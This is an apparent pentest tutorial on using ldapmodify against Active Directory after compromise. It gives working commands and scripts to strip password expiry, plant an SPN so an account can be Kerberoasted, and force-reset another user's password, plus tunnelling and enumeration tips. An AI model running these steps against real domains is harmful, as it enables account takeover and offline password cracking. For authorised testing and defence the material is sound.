
LdapModify

When to Use

You'll know when you've found a domain controller, because it will have several ports open that clearly distinguish it:

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Upon establishing a foothold on a domain-joined host, you could use a SOCKS proxy and proxychains or a layer 3 tunnel like ligolo-ng to do a sweep of the host's subnet in order to enumerate and extend your attack surface.


Query the Domain Owned by the Domain Controller

  • Very helpful in a post-compromise scenario
  • You have found a likely domain controller based on its port signature
    • DNS
    • LDAP
    • Kerberos
    • SMB
  • The rootDSE of a domain controller is readable without credentials, so an anonymous simple bind (-x with no -D) and a base-scope search against the empty base returns the naming contexts it hosts: the domain partition (defaultNamingContext, e.g. DC=contoso,DC=org) plus the configuration, schema and DNS application partitions. The domain partition's DN is what you pass as -b in every later search.
# Query the naming contexts from the rootDSE (-b '' makes the empty base explicit so a BASE setting in ldap.conf cannot interfere)
ldapsearch -x -H ldap://dc-ip-here -b '' -s base namingcontexts defaultnamingcontext

# Through a proxy host
proxychains -q ldapsearch -x -H ldap://dc-ip-here -b '' -s base namingcontexts defaultnamingcontext

Authentication Options

These are the flags you'll use most when binding with ldapmodify (ldapsearch takes the same ones):

  • -x : simple bind (username and password) instead of SASL
  • -H : LDAP URI of the target, e.g. ldap://dc-ip-here (389), ldaps://dc-ip-here (636), or ldaps://dc-ip-here:3269 for the global catalog
  • -D : bind identity (who you're authenticating as). Against Active Directory this does not have to be a DN; assuming the domain is contoso.org, any of these work:
    • DistinguishedName: CN=admin,CN=Users,DC=contoso,DC=org (the default Users container)
    • UserPrincipalName: admin@contoso.org
    • sAMAccountName with a domain prefix: CONTOSO\admin (NetBIOS name) or contoso.org\admin
  • -W : prompt for the password
  • -w : password on the command line (it lands in shell history and is visible in ps output; avoid it outside a lab)
  • -y : read the password from a file instead (chmod 600 it)

A simple bind sends the password in cleartext, so prefer ldaps:// (636/3269) whenever the DC presents a certificate you can reach. Domain controllers configured to require LDAP signing reject a simple bind over plain ldap:// with strongerAuthRequired (result code 8), so if a bind that worked over 389 in the lab fails in the field, switch to ldaps:// or to Kerberos (-Y GSSAPI).

Example Commands

Say the rootDSE query above returned a default naming context of "DC=contoso,DC=org". That is the distinguished name of the domain partition, which maps directly to the domain's DNS name contoso.org, and contoso.org is also the suffix of UserPrincipalNames such as admin@contoso.org. The user's own DN cannot be read off its UPN, though: it reflects the container the object sits in (CN=admin,CN=Users,DC=contoso,DC=org for the default Users container; the examples below assume the target lives in a custom OU=Users). Resolve it first with an ldapsearch for (sAMAccountName=jane.doe) against the domain base and copy the dn line into your LDIF. All three modifications below need rights on the target object: GenericAll, or GenericWrite for the attribute changes and the User-Force-Change-Password extended right for the password reset. A standard domain user cannot do them to someone else's account.

Set UAC 66048 (Password Never Expires)

66048 is 0x10200: NORMAL_ACCOUNT (0x200) with DONT_EXPIRE_PASSWORD (0x10000) set. Because this is a replace of the whole bitmask, every other flag the account had (ACCOUNTDISABLE, TRUSTED_FOR_DELEGATION, DONT_REQ_PREAUTH, and so on) is cleared by it. On anything other than a plain, enabled user account, read the current userAccountControl first and OR 0x10000 into it instead of writing a fixed constant.
ldapmodify -x -H ldap://dc-ip-here -D 'admin@contoso.org' -W << EOF
dn: CN=jane.doe,OU=Users,DC=contoso,DC=org
changetype: modify
replace: userAccountControl
userAccountControl: 66048
EOF
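The constant above only suits an account whose bitmask is already exactly NORMAL_ACCOUNT. The following is an added example, not code from the original page: it looks the target DN up by sAMAccountName (the step the hard-coded DNs on this page assume you have already done), reads the current userAccountControl, ORs a single flag into it, writes it back with replace, and decodes the result so you can confirm nothing else was dropped. dc-ip-here, admin@contoso.org, the search base and the PWFILE bind-password file are stand-ins; the two live functions need a reachable DC and are not run by the block itself.

```shell
#!/bin/sh
# Added example (not from the original page): add one userAccountControl flag
# without clobbering the others, and decode the bitmask to check the result.
# Stand-ins: dc-ip-here, admin@contoso.org, DC=contoso,DC=org, $PWFILE.

# Decode a userAccountControl integer into flag names (well-known bit values).
uac_decode() {
  v=$1; out=""
  for pair in \
    1:SCRIPT 2:ACCOUNTDISABLE 8:HOMEDIR_REQUIRED 16:LOCKOUT 32:PASSWD_NOTREQD \
    64:PASSWD_CANT_CHANGE 128:ENCRYPTED_TEXT_PWD_ALLOWED 256:TEMP_DUPLICATE_ACCOUNT \
    512:NORMAL_ACCOUNT 2048:INTERDOMAIN_TRUST_ACCOUNT 4096:WORKSTATION_TRUST_ACCOUNT \
    8192:SERVER_TRUST_ACCOUNT 65536:DONT_EXPIRE_PASSWORD 131072:MNS_LOGON_ACCOUNT \
    262144:SMARTCARD_REQUIRED 524288:TRUSTED_FOR_DELEGATION 1048576:NOT_DELEGATED \
    2097152:USE_DES_KEY_ONLY 4194304:DONT_REQ_PREAUTH 8388608:PASSWORD_EXPIRED \
    16777216:TRUSTED_TO_AUTH_FOR_DELEGATION
  do
    bit=${pair%%:*}; name=${pair#*:}
    if [ $(( v & bit )) -ne 0 ]; then
      out="$out${out:+ }$name"
    fi
  done
  printf '%s\n' "$out"
}

# OR a flag into the current value; the flag may be decimal or 0x-prefixed hex.
uac_set_flag() {
  printf '%d\n' $(( $1 | $2 ))
}

# Live: resolve a sAMAccountName to its DN. -LLL strips LDIF comments/version.
# Caveats: escape ( ) * \ in $1 before putting it in a filter; LDIF folds DNs
# longer than 76 characters onto a continuation line, unfold those before use.
user_dn() {
  ldapsearch -LLL -x -H ldaps://dc-ip-here -D 'admin@contoso.org' -y "$PWFILE" \
    -b 'DC=contoso,DC=org' "(sAMAccountName=$1)" dn | sed -n 's/^dn: //p'
}

# Live: read-modify-write of userAccountControl on one object.
uac_add_flag_live() {
  dn=$1; flag=$2
  cur=$(ldapsearch -LLL -x -H ldaps://dc-ip-here -D 'admin@contoso.org' -y "$PWFILE" \
          -b "$dn" -s base userAccountControl | sed -n 's/^userAccountControl: //p')
  new=$(uac_set_flag "$cur" "$flag")
  echo "userAccountControl $cur -> $new ($(uac_decode "$new"))" >&2
  ldapmodify -x -H ldaps://dc-ip-here -D 'admin@contoso.org' -y "$PWFILE" << EOF
dn: $dn
changetype: modify
replace: userAccountControl
userAccountControl: $new
EOF
}

# Live usage:  PWFILE=./admin.pw; uac_add_flag_live "$(user_dn jane.doe)" 0x10000
# Offline: decode the constant the page writes.
uac_decode 66048    # NORMAL_ACCOUNT DONT_EXPIRE_PASSWORD
```

The decoder is also handy on the read side: 4260352, for instance, decodes to NORMAL_ACCOUNT DONT_EXPIRE_PASSWORD DONT_REQ_PREAUTH, i.e. an AS-REP-roastable account, which is what you want to spot (or avoid creating by accident) when you sweep userAccountControl values across a domain.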
Set a ServicePrincipalName (cifs/cifs)

Giving a user account an SPN makes it a Kerberoasting target: anyone holding a valid TGT can request a service ticket for cifs/cifs, which is encrypted with the account's long-term key and can be cracked offline. The string itself can be arbitrary (cifs/cifs is just an example), but SPNs must be unique across the forest; on Windows Server 2012 R2 and later a duplicate is rejected with a constraint violation, so check that nothing else carries the value first. Use add rather than replace so the account's existing SPNs survive, and remove the value again with "delete: servicePrincipalName" once you have the ticket.
ldapmodify -x -H ldap://dc-ip-here -D 'admin@contoso.org' -W << EOF
dn: CN=jane.doe,OU=Users,DC=contoso,DC=org
changetype: modify
add: servicePrincipalName
servicePrincipalName: cifs/cifs
EOF
Change a User Password (jane.doe)

Active Directory ignores writes to userPassword by default (it only honours them when the fUserPwdSupport dSHeuristics flag is set). The attribute to write is unicodePwd, and the DC only accepts it over an encrypted channel (LDAPS, or SASL with signing and sealing); over plain ldap:// the modify fails with unwillingToPerform. The value is the new password wrapped in double quotes, encoded as UTF-16LE and base64-encoded in the LDIF (note the double colon). Build it in a variable first: inside single quotes the shell leaves $$ alone, whereas in an unquoted heredoc it would expand it to the shell's PID.
# "P@$$word123!" -> UTF-16LE -> base64 (the surrounding quotes are part of the value)
NEWPW=$(printf '"%s"' 'P@$$word123!' | iconv -f UTF-8 -t UTF-16LE | base64 -w0)
ldapmodify -x -H ldaps://dc-ip-here -D 'admin@contoso.org' -W << EOF
dn: CN=jane.doe,OU=Users,DC=contoso,DC=org
changetype: modify
replace: unicodePwd
unicodePwd:: $NEWPW
EOF
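The unicodePwd value format is the part people get wrong. Below is an added example, not code from the original page, that builds the value in plain shell for ASCII passwords (so it does not depend on iconv), refuses non-ASCII input rather than silently mis-encoding it, and wraps both ways of writing the attribute: the administrative reset (one replace, needs the reset right) and the self-service change (delete old value plus add new value in a single modify, which is how an account changes its own password and is subject to the password policy). dc-ip-here, admin@contoso.org, jane.doe@contoso.org and the password-file argument are stand-ins; the live functions need a reachable DC and are not run by the block.

```shell
#!/bin/sh
# Added example (not from the original page): build the unicodePwd value
# Active Directory expects and send it over LDAPS.
# Stand-ins: dc-ip-here, admin@contoso.org, jane.doe@contoso.org, $pwfile.

# UTF-16LE-encode an ASCII string: every byte is followed by a NUL byte.
utf16le_ascii() {
  s=$1
  while [ -n "$s" ]; do
    c=${s%"${s#?}"}        # first character of $s
    printf '%s\000' "$c"
    s=${s#?}
  done
}

# AD wants the password wrapped in double quotes as UTF-16LE; LDIF carries a
# binary value base64-encoded after a double colon. Non-ASCII input is refused
# rather than mis-encoded (transcode those with iconv -f UTF-8 -t UTF-16LE).
unicodepwd_value() {
  pw=$1
  if [ -n "$(printf '%s' "$pw" | LC_ALL=C tr -d ' -~')" ]; then
    echo "unicodepwd_value: non-ASCII password, use iconv instead" >&2
    return 1
  fi
  utf16le_ascii "\"$pw\"" | base64 | tr -d '\n'
}

# Live: administrative reset. One replace; needs User-Force-Change-Password on
# the target. Over plain ldap:// the DC answers unwillingToPerform.
reset_password_live() {
  dn=$1; pwfile=$3
  val=$(unicodepwd_value "$2") || return 1
  ldapmodify -x -H ldaps://dc-ip-here -D 'admin@contoso.org' -y "$pwfile" << EOF
dn: $dn
changetype: modify
replace: unicodePwd
unicodePwd:: $val
EOF
}

# Live: self-service change. The account binds as itself, deletes its old value
# and adds the new one in a single modify; the DC checks the old password and
# enforces history, length and complexity on this path.
change_own_password_live() {
  dn=$1
  oldval=$(unicodepwd_value "$2") || return 1
  newval=$(unicodepwd_value "$3") || return 1
  ldapmodify -x -H ldaps://dc-ip-here -D 'jane.doe@contoso.org' -W << EOF
dn: $dn
changetype: modify
delete: unicodePwd
unicodePwd:: $oldval
-
add: unicodePwd
unicodePwd:: $newval
EOF
}

# Offline: the LDIF value for the page's sample password.
unicodepwd_value 'P@$$word123!'; echo
```

Because the value is binary, never paste it through a `userPassword:`-style single-colon line; ldapmodify would send the base64 text itself as the password. The double colon is what tells the LDIF parser to decode it first.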

More Examples

See this page for more example commands using Kerberos authentication